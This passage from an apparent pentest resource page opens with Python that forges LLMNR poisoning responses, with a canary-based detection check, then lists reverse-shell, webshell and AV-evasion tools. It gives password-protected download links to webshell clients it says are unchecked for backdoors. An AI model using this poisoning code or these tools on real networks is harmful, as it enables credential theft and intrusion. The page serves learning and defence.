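        labels.append(data[offset:offset + length].decode("ascii"))
        offset += length


def build_query(txid, name, qtype=1):
    """What a host multicasts when a name is not found in DNS (qtype 1 = A record)."""
    header = struct.pack("!HHHHHH", txid, 0, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack("!HH", qtype, 1)


def parse_query(packet):
    txid, flags, qdcount, _, _, _ = struct.unpack("!HHHHHH", packet[:12])
    if flags & QR_BIT or qdcount != 1:
        raise ValueError("not a single-question LLMNR query")
    name, off = decode_name(packet, 12)
    qtype, _qclass = struct.unpack("!HH", packet[off:off + 4])
    return txid, name, qtype


def build_poisoned_response(query, answer_ip, ttl=30):
    """Answer ANY query with the attacker's address, mirroring the transaction ID."""
    txid, name, qtype = parse_query(query)
    header = struct.pack("!HHHHHH", txid, QR_BIT, 1, 1, 0, 0)
    question = encode_name(name) + struct.pack("!HH", qtype, 1)
    rdata = bytes(int(octet) for octet in answer_ip.split("."))
    answer = encode_name(name) + struct.pack("!HHIH", 1, 1, ttl, len(rdata)) + rdata
    return header + question + answer


def parse_response(packet):
    """Return (txid, answered name, IPv4 address) from the first answer record."""
    txid, flags, qdcount, ancount, _, _ = struct.unpack("!HHHHHH", packet[:12])
    if not flags & QR_BIT or qdcount != 1 or ancount < 1:
        raise ValueError("not an LLMNR response carrying an answer")
    _, off = decode_name(packet, 12)
    off += 4                                   # skip QTYPE/QCLASS of the echoed question
    name, off = decode_name(packet, off)
    _rtype, _rclass, _ttl, rdlen = struct.unpack("!HHIH", packet[off:off + 10])
    off += 10
    ip = ".".join(str(b) for b in packet[off:off + rdlen])
    return txid, name, ip


def looks_poisoned(canary_name, packet):
    """Detection check: a canary name that exists nowhere must never be answered."""
    try:
        _, name, _ = parse_response(packet)
    except ValueError:
        return False
    return name.lower() == canary_name.lower()


if __name__ == "__main__":
    # Constructed exchange: victim asks for a mistyped share host, poisoner answers.
    query = build_query(0x1234, "fileshare01")
    response = build_poisoned_response(query, "10.0.0.66")
    print(parse_response(response))
    canary = build_query(0x4242, "zz-canary-does-not-exist")
    print("poisoner present:",
          looks_poisoned("zz-canary-does-not-exist", build_poisoned_response(canary, "10.0.0.66")))
```

The victim then connects to the attacker's address for SMB or HTTP and offers its NetNTLM credentials, which is where the password crackers earlier on this page come in. On the defensive side, disabling LLMNR and NBT-NS via group policy removes the query in the first place; where that is not possible, periodically multicasting a query for a name that cannot exist and alerting on any answer (the `looks_poisoned` check) is a cheap way to catch a poisoner on the segment.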

Shell

  • Goshell - Generate reverse shells in command line with Go !
  • Print-My-Shell - Python script written to automate the generation of various reverse shells.
  • Reverse-shell-generator - Hosted reverse shell generator with a ton of functionality (great for CTFs).
  • Girsh - Automatically spawns a fully interactive reverse shell from a Linux or Windows victim.
  • Blueshell - Generates reverse shells for red-team use.
  • Clink - Powerful Bash-style command line editing for cmd.exe
  • Natpass - A RAT supporting web-based VNC and a webshell.
  • Platypus - A modern multiple reverse shell sessions manager written in go
  • shells - Script for generating revshells
  • Reverse_ssh - SSH based reverse shell
  • Hoaxshell - A Windows reverse shell payload generator and handler that abuses the http(s) protocol to establish a beacon-like reverse shell.

Listener

  • Netcat - Netcat is a networking utility that reads and writes data across network connections over TCP or UDP.
  • Rustcat - Rustcat(rcat) - The modern Port listener and Reverse shell.
  • Rlwrap - A readline wrapper.
  • Pwncat - Fancy reverse and bind shell handler.
  • Powercat - Netcat-style features implemented in PowerShell 2.0.
  • Socat - Socat is a flexible, multi-purpose relay tool.

Web Shell

  • Chopper

Note: this tool was obtained from the internet and has not been checked for backdoors; use it at your own risk.

Link: https://pan.baidu.com/s/1VnXkoQU-srSllG6JaY0nTA Password: v71d

  • AntSword : Document - AntSword is a cross-platform website management toolkit

  • CKnife - A cross-platform webshell tool written in Java.

Note: this tool was obtained from the internet and has not been checked for backdoors; use it at your own risk.

Link: https://pan.baidu.com/s/1QZrnWU7DUuJhiXl7u1kELw Password: hjrh

  • Behinder - Webshell management client that uses dynamic binary encryption of its traffic.
  • Godzilla - Java webshell management tool that encrypts its network traffic.
  • Skyscorpion - Modified version of Behinder.
  • PyShell - Multiplatform Python webshell.
  • Weevely3 - Weaponized web shell.
  • Bantam - A PHP backdoor management and generation tool/C2 with end-to-end encrypted payload streaming, designed to bypass WAF, IDS and SIEM systems.
  • Awsome-Webshells - Collection of reverse shells.
  • php-reverse-shell - Simple PHP reverse shell.
  • Webshell_Generate - Generates various webshells that bypass AV.

Vulnerability application

  • DVWA - Damn Vulnerable Web Application (DVWA)
  • WebGoat - WebGoat is a deliberately insecure web application maintained by OWASP designed to teach web application security lessons
  • DSVW - DSVW is a deliberately vulnerable web application written in under 100 lines of code, created for educational purposes
  • DVWS - Damn Vulnerable Web Services is an insecure web application with multiple vulnerable web service components that can be used to learn real world web service vulnerabilities
  • XVWA - XVWA is a badly coded web application written in PHP/MySQL that helps security enthusiasts to learn application security
  • BWAPP - A buggy web application with more than 100 vulnerabilities
  • Sqli-lab - SQLi labs to practise error-based, boolean-based blind and time-based injection
  • HackMe-SQL-Injection-Challenges - Hack your friend's online MMORPG game, with a specific focus on SQL injection opportunities
  • XSS-labs - Small set of scripts to practise exploiting XSS and CSRF vulnerabilities
  • SSRF-lab - Lab for exploring SSRF vulnerabilities
  • SSRF_Vulnerable_Lab - This lab contains sample code vulnerable to Server-Side Request Forgery attacks
  • LFI-labs - Small set of PHP scripts to practise exploiting LFI, RFI and command injection vulnerabilities
  • Commix-testbed - A collection of web pages vulnerable to command injection flaws
  • File-Upload-Lab - Damn Vulnerable File Upload V 1.1
  • Upload-labs - A collection covering all types of file-upload vulnerabilities
  • XXE-Lab - An XXE vulnerability demo with versions in several languages (PHP, Java, Python, C#, etc.)
  • Vulnerable-Flask-App - Erlik2 Vulnerable-Flask-App, provided by anil-yelken.

CTF challenges

  • Vulnhub - VulnHub provides materials allowing anyone to gain practical hands-on experience with digital security, computer applications and network administration
  • TryHackMe - TryHackMe is a free online platform for learning cyber security, using hands-on exercises and labs, all through your browser!
  • Hackthebox - Hack The Box is a massive, online cybersecurity training platform, allowing individuals, companies, universities and all kinds of organizations around the world to level up their hacking skills.
  • Root Me - Root Me allows everyone to test and improve their knowledge in computer security and hacking.
  • Pentestit - Penetration testing laboratories "Test lab" emulate an IT infrastructure of real companies and are created for a legal pen testing and improving penetration testing skills
  • Pentesterlab - Learn Web Penetration Testing: The Right Way
  • Cyberseclabs - At CyberSecLabs, we aim to provide secure, high-quality training services that allow information security students the opportunity to safely learn and practice penetration testing skills.
  • Web Security Academy - Free, online web security training from the creators of Burp Suite
  • Vulnmachines - A place to learn and improve penetration testing/ethical hacking skills for FREE